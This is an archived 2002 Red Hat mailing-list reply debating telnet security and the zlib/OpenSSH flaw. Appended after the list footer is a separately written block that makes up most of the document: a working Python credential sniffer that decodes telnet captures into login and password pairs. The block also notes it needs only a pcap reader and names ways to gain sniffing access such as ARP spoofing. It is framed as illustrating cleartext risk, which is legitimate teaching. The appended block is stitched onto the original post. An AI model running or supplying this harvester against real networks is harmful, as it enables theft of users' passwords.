On Thu, 14 Mar 2002, David Talkington wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Rick Warner wrote:
>
> >> Leaving aside for a moment the fact that the Sun admin needs his/her
> >> head checked for having telnet open in the first place (it appears
> >> that the telnet buffer overflow from last summer was patched ... in
> >> _January_), you should probably try 'export TERM=vt100' before
> >> connecting and see if that helps.
> >>
> >> If, on the other hand, it is you that administers this Sun box, then
> >> *thwap* to you for not killing telnet ages ago.
>
> >Nothing wrong with telnet in a firewalled environment, unless you are
> >worried about your users.
>
> I'll sidestep a lengthy discussion of best practices, but that isn't
> true. If you pass cleartext internally, any breach results in
> ownership of all your passwords.
Again there are multiple issues: can you trust your internal users, how
immune is your internal structure to 'sniffing', etc. And 'any breach'
does not necessarily compromise all passwords; one must assume the
possibility, but it is not necessarily true.
> I'm not sure I'd equate a 4-month-old remotely exploitable buffer
> overflow with a locally-exploitable vulnerability (*) that was
> patched in hours. But that's just my opinion.
Go back and read the reports. The alerts specifically state that there
were no known remote exploits but the possibility could not be ruled
out. Therefore, a 'best practice' assumption is that a remote exploit is
possible albeit unknown. A wise security admin would assume it is
probable.
> As for zlib, not only is its effect on sshd incidental, but its
> potential ramifications extend to a dizzying array of software on both
> Unix and Win32, so I'm not sure that's relevant in this case
The fact that there are over 500 applications known to be vulnerable due
to this bug is irrelevant to this discussion. What is relevant is that
OpenSSH is vulnerable due to its dependence on zlib. Not incidental,
critical.
- rick
_______________________________________________
Redhat-list mailing list
[EMAIL PROTECTED]
https://listman.redhat.com/mailman/listinfo/redhat-list
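The "any breach results in ownership of all your passwords" point above is easy to make concrete. What follows is an added example for this thread, not code from the list or from any vendor tool: a small Python decoder that takes the two directions of one telnet TCP connection, in capture order, as a sniffer on the same segment would reassemble them, strips the option negotiation, and pulls out the login and password typed at the prompts. The session bytes, the prompt strings and the hostname are constructed for the example; the only thing a real attacker would need to add is a pcap reader to feed it.

```python
"""Decode the credentials from a cleartext telnet session.

Added example for this thread, not code from the list or from any vendor
tool. Input is the two directions of one telnet TCP connection in capture
order, as a sniffer on the same segment would reassemble them. The session
bytes below are constructed for the example.
"""

# Telnet command bytes (RFC 854)
IAC, SE, SB, WILL, WONT, DO, DONT = 255, 240, 250, 251, 252, 253, 254


def strip_telnet_negotiation(data: bytes) -> bytes:
    """Return only the application bytes, dropping IAC command sequences
    (WILL/WONT/DO/DONT option negotiation and SB...SE subnegotiation).
    An escaped data byte (IAC IAC) is kept as a single 0xFF."""
    out = bytearray()
    i, n = 0, len(data)
    while i < n:
        b = data[i]
        if b != IAC:
            out.append(b)
            i += 1
        elif i + 1 >= n:          # dangling IAC at end of segment
            break
        elif data[i + 1] == IAC:  # IAC IAC -> literal 0xFF
            out.append(IAC)
            i += 2
        elif data[i + 1] in (WILL, WONT, DO, DONT):
            i += 3                # IAC <cmd> <option>
        elif data[i + 1] == SB:   # skip subnegotiation up to IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            i = n if end < 0 else end + 2
        else:
            i += 2                # other two-byte commands (NOP, GA, ...)
    return bytes(out)


def extract_credentials(segments):
    """segments: list of (direction, payload) in capture order, direction
    'S' for server->client and 'C' for client->server.
    Returns the (login, password) pairs typed during the session.
    Handles one-keystroke-per-packet input and backspace/DEL editing."""
    creds = []
    expecting = None          # 'login' or 'password' once a prompt is seen
    typed = bytearray()
    login = None
    for direction, payload in segments:
        data = strip_telnet_negotiation(payload)
        if direction == 'S':
            # the prompt is the last line the server sent
            text = data.decode('latin-1').rstrip()
            last = text.rsplit('\n', 1)[-1].strip().lower()
            if last.endswith('login:'):
                expecting, typed = 'login', bytearray()
            elif last.endswith('password:'):
                expecting, typed = 'password', bytearray()
            continue
        if expecting is None:     # keystrokes outside a prompt are ignored
            continue
        for b in data:
            if b in (0x08, 0x7f):           # BS / DEL: drop last char
                if typed:
                    typed.pop()
            elif b in (0x0d, 0x0a):         # Enter: sent as CR LF or CR NUL
                value = typed.decode('latin-1')
                if expecting == 'login':
                    login = value
                else:
                    creds.append((login, value))
                expecting, typed = None, bytearray()
                break
            elif b != 0x00:
                typed.append(b)
    return creds


def sample_session():
    """Constructed capture of a login over telnet: option negotiation,
    terminal-type subnegotiation, then the login and password prompts.
    The client sends the login one keystroke per packet (server echoes),
    mistypes one character and corrects it with DEL."""
    seg = [
        ('S', b'\xff\xfd\x18\xff\xfd\x1f\xff\xfd\x23\xff\xfd\x27'),  # DO TTYPE/NAWS/XDISPLOC/NEW-ENVIRON
        ('C', b'\xff\xfb\x18\xff\xfb\x1f\xff\xfc\x23\xff\xfb\x27'),  # WILL/WILL/WONT/WILL
        ('S', b'\xff\xfa\x18\x01\xff\xf0'),                          # SB TTYPE SEND SE
        ('C', b'\xff\xfa\x18\x00vt100\xff\xf0'),                     # SB TTYPE IS "vt100" SE
        ('S', b'\r\nSunOS 5.8\r\n\r\nlogin: '),
    ]
    for ch in b'ricl':
        seg += [('C', bytes([ch])), ('S', bytes([ch]))]
    seg += [('C', b'\x7f'), ('S', b'\x08 \x08')]             # DEL the stray 'l'
    seg += [('C', b'k'), ('S', b'k')]
    seg += [('C', b'\r\x00'), ('S', b'\r\n')]
    seg += [('S', b'Password: '),
            ('C', b'hunter2\r\n'),                          # password is not echoed
            ('S', b'\r\nLast login: Thu Mar 14 09:12:31 on pts/3\r\n$ ')]
    return seg


if __name__ == '__main__':
    for user, pw in extract_credentials(sample_session()):
        print(f'login={user!r} password={pw!r}')
```

Run it as-is to see the constructed session decoded; on a real network the same two functions sit behind a pcap reader that groups packets by TCP flow. Note that nothing here is an attack on telnet: the protocol simply puts the keystrokes on the wire, so anyone who can read the segment (a compromised host on the same switch, an ARP-spoofed path, a tapped uplink) gets the same result.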